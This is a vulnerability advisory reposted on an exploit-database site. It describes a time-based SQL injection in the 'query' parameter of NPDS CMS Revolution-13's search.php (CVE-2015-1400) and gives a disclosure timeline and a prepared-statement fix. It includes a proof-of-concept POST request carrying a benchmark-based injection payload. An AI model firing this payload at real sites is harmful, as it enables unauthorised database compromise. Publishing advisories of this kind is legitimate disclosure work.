0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

NPDS CMS Revolution-13 SQL Injection Vulnerability

Author

Nahendra Bhati

Risk

[

Security Risk High

]

0day-ID

Category

Date add

CVE

Platform

Title -  NPDS CMS Revolution-13 - SQL Injection Vulnerability

Credits & Author: 
Narendra Bhati  (  R00t Sh3ll ) 
www.websecgeeks.com

References (Source):
====================
http://www.npds.org/viewtopic.php?topic=26233&forum=12
http://websecgeeks.com/npds-cms-sql-injection/

Release Date:
=============
24-01-2015


CVE ID :
====================================
CVE-2015-1400



Product & Service Introduction:
===============================
http://www.npds.org/

Abstract Advisory Information:
==============================
Narendra Bhati ( R00t Sh3ll ) An Information Security Analyst In Pune ( India ) discovered a remote sql injection  vulnerability in the NPDS CMS .


Vulnerability Disclosure Timeline:
==================================
25-01-2015 :  Public Disclosure


Timeline Status:
=================
Reported To Vendor  – 14-12-2014 
Verified By Vendor –  15-12-2014
Acknowledge By Vendor – 24-01-2015
Public Disclosure By Vendor – 24-01-2015
Technical Disclosure  – 25-01-2015
Vendor Security Advisory – http://www.npds.org/viewtopic.php?topic=26233&forum=12 
Technical Disclosure - http://websecgeeks.com/npds-cms-sql-injection/
CVE-2015-1400
Mitigation For This Vulnerability – There Is No Update By Vendor , But That Will Be Out Soon !

Affected Product(s):
====================
NPDS-Revolution-13

Exploitation Technique:
=======================
Remote

Severity Level:
===============
High


Technical Details & Description:
================================
A sql injection web vulnerability has been discovered in the NPDS CMS - NPDS-Revolution-13.
The vulnerability allows an attacker to inject sql commands by usage of a vulnerable value to compromise the application dbms.

The sql injection vulnerability is located in the `query` parameter of the vulnerable `search.php ` application file. Remote attackers 
are able to inject own sql commands by usage of vulnerable `search.php ` file. A successful attack requires to 
manipulate a POST method request with vulnerable parameter `query` value to inject own sql commands. The injection is a time based ( tested ) by sql injection 
that allows to compromise the web-application and connected dbms.

Request Method(s):
        [+] POST

Vulnerable Module(s):
        [+] NPDS-Revolution-13

Vulnerable File(s):
        [+] search.php

Vulnerable Parameter(s):
        [+] query


Proof of Concept (PoC):
=======================
The remote sql injection web vulnerability can be exploited by remote attackers without privileged application user account.
For reproduce the security vulnerability follow the provided information and steps below to continue.

HTTP Request

##### ==========
POST /npds/search.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/npds/index.php?op=edito
Cookie: cookievalue
Connection: keep-alive
content-type:! application/x-www-form-urlencoded
Content-Length: 63

query=”)and benchmark(20000000,sha1(1))–

====================================
Reference(s):
http://www.npds.org/viewtopic.php?topic=26233&forum=12
http://websecgeeks.com/npds-cms-sql-injection/


Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the vulnerability `query` parameter value in the search.php file.
Use a prepared statement to fix the issues fully and setup own exception that prevents sql injection attacks.


Security Risk:
==============
The security risk of the remote sql injection web vulnerability as critical

#  0day.today [2024-11-14]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

NPDS CMS Revolution-13 SQL Injection Vulnerability

Report Error

Report Error